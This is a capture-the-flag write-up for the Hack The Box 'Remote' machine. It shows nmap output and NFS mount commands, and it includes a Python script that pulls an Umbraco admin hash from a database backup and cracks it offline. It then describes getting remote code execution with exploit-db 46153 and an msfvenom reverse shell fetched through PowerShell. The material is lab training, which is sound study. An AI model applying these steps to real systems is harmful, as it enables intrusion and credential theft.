Recon

nmap

21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3,4 2049/tcp nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/udp mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100024 1 2049/tcp status
|_ 100024 1 2049/udp status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open mountd 1-3 (RPC #100005)

No surprise, so let's go to port 80 and take a look, with gobuster running in the background. Meanwhile, port 2049 is the really interesting one: the rpcinfo output shows nfs, mountd and nlockmgr all registered there, so the host is exporting something over NFS. Let's see what is exported and try to mount it.

root@kali:/htb/Remote_180# showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)
root@kali:/htb/Remote_180# dir
root@kali:/htb/Remote_180# mkdir mount
root@kali:/htb/Remote_180# mount -t nfs 10.10.10.180:/site_backups ./mount

Obviously there is a remote directory that everyone can mount: an NFS export to "everyone" needs no authentication at all, any host that can reach port 2049 gets it. I mount it on the local directory ./mount. Once mounted, the share turns out to be a backup of the web site, which is built on the Umbraco CMS. Some research and file enumeration in the backup shows that Umbraco's database, Umbraco.sdf (a SQL Server Compact file, not a log), is stored under App_Data. It holds the user records, including the admin account admin@htb.local (an address that also shows up in the access logs) and its password hash. Cracking that hash gives the password: baconandcheese
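The extraction and cracking step above, as an added example (not code from the original write-up). It does what running strings over the backup does: scan the raw bytes of an Umbraco.sdf-style file for a user record, where Umbraco 7 stores the login email, the password digest and a small JSON blob naming the hash algorithm next to each other, then runs an offline dictionary attack with the algorithm the record names. The SAMPLE_SDF bytes and the WORDLIST are constructed for the demo (the digest is computed at import time, it is not the value from the box), and the record layout is an assumption based on what strings shows for such files.

```python
"""Pull an Umbraco admin hash out of an Umbraco.sdf-style blob and crack it.

Added example. Umbraco.sdf is a SQL Server Compact database; instead of
parsing its page format this scans the raw bytes, the same way `strings`
surfaces the user record. Assumption: the record is laid out as
<email><hex digest>{"hashAlgorithm":"..."} with unsalted SHA1/SHA256, which is
what the legacy Umbraco membership provider writes.
"""
import hashlib
import json
import re

# Constructed stand-in for the relevant bytes of App_Data/Umbraco.sdf.
# The digest is computed here so the demo is self-consistent; it is NOT the
# hash from the box. In a real dump the login name ("admin") is often glued to
# the email with no separator, so sanity-check the extracted address by eye.
_DEMO_PASSWORD = "baconandcheese"
DEMO_DIGEST = hashlib.sha1(_DEMO_PASSWORD.encode()).hexdigest()
SAMPLE_SDF = (
    b"\x00\x00\x05\x00admin\x00"
    + b"admin@htb.local"
    + DEMO_DIGEST.encode()
    + b'{"hashAlgorithm":"SHA1"}'
    + b"admin@htb.localen-US\x00\x00"
)

# Constructed wordlist standing in for rockyou.txt.
WORDLIST = ["password", "umbraco", "letmein", "baconandcheese", "admin123"]

# hashcat modes for the digest types this handles (for a real wordlist run).
HASHCAT_MODE = {"sha1": 100, "sha256": 1400}

# email, immediately followed by a 40-hex (SHA1) or 64-hex (SHA256) digest,
# then the JSON blob Umbraco writes beside the hash. The exact-length digest
# group keeps the greedy TLD from swallowing leading letters of the hash.
RECORD_RE = re.compile(
    rb"([A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,})"
    rb"([0-9a-fA-F]{40}|[0-9a-fA-F]{64})"
    rb'(\{"hashAlgorithm":"[^"]+"\})'
)


def extract_records(blob: bytes):
    """Return (email, hex_digest, algorithm) tuples found in the raw bytes."""
    records = []
    for m in RECORD_RE.finditer(blob):
        email, digest, meta = (g.decode("ascii", "replace") for g in m.groups())
        algo = json.loads(meta)["hashAlgorithm"]
        records.append((email, digest.lower(), algo))
    return records


def crack(digest: str, algo: str, wordlist):
    """Offline dictionary attack: hash each candidate with the algorithm the
    record names and compare to the stored digest. Returns the password or
    None. Only unsalted hex digests are handled; a salted or base64 scheme
    would need a different mode and is rejected rather than guessed at."""
    name = algo.lower()
    if name not in HASHCAT_MODE:
        raise ValueError(f"unsupported hash algorithm in record: {algo}")
    for word in wordlist:
        if hashlib.new(name, word.encode()).hexdigest() == digest.lower():
            return word
    return None


if __name__ == "__main__":
    for email, digest, algo in extract_records(SAMPLE_SDF):
        print(f"{email}:{digest}  ({algo}, hashcat -m {HASHCAT_MODE[algo.lower()]})")
        print("  cracked:", crack(digest, algo, WORDLIST))
```

Against a real backup, read the whole file into `blob` and feed the printed email:digest line to hashcat with the listed mode and a proper wordlist; the in-script loop is only there so the example runs offline. If the JSON names an algorithm other than SHA1 or SHA256, the record is using a different scheme and the digest should not be assumed to be a plain unsalted hash.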

User

Now I can log in to the CMS with those credentials. There is a known exploit for this Umbraco version online: exploit-db 46153, an authenticated remote code execution. I tried the Python exploit and wasted some time assuming I could not get the command output back; in fact the output is there and can be retrieved with a simple modification of the request in Burp Suite. Once commands run, getting a shell is not hard: first use PowerShell to download a reverse shell .bat file generated with msfvenom, then execute it the same way.

Root

No ideas yet… I know it should be an exploit related to TeamViewer, but so far no progress.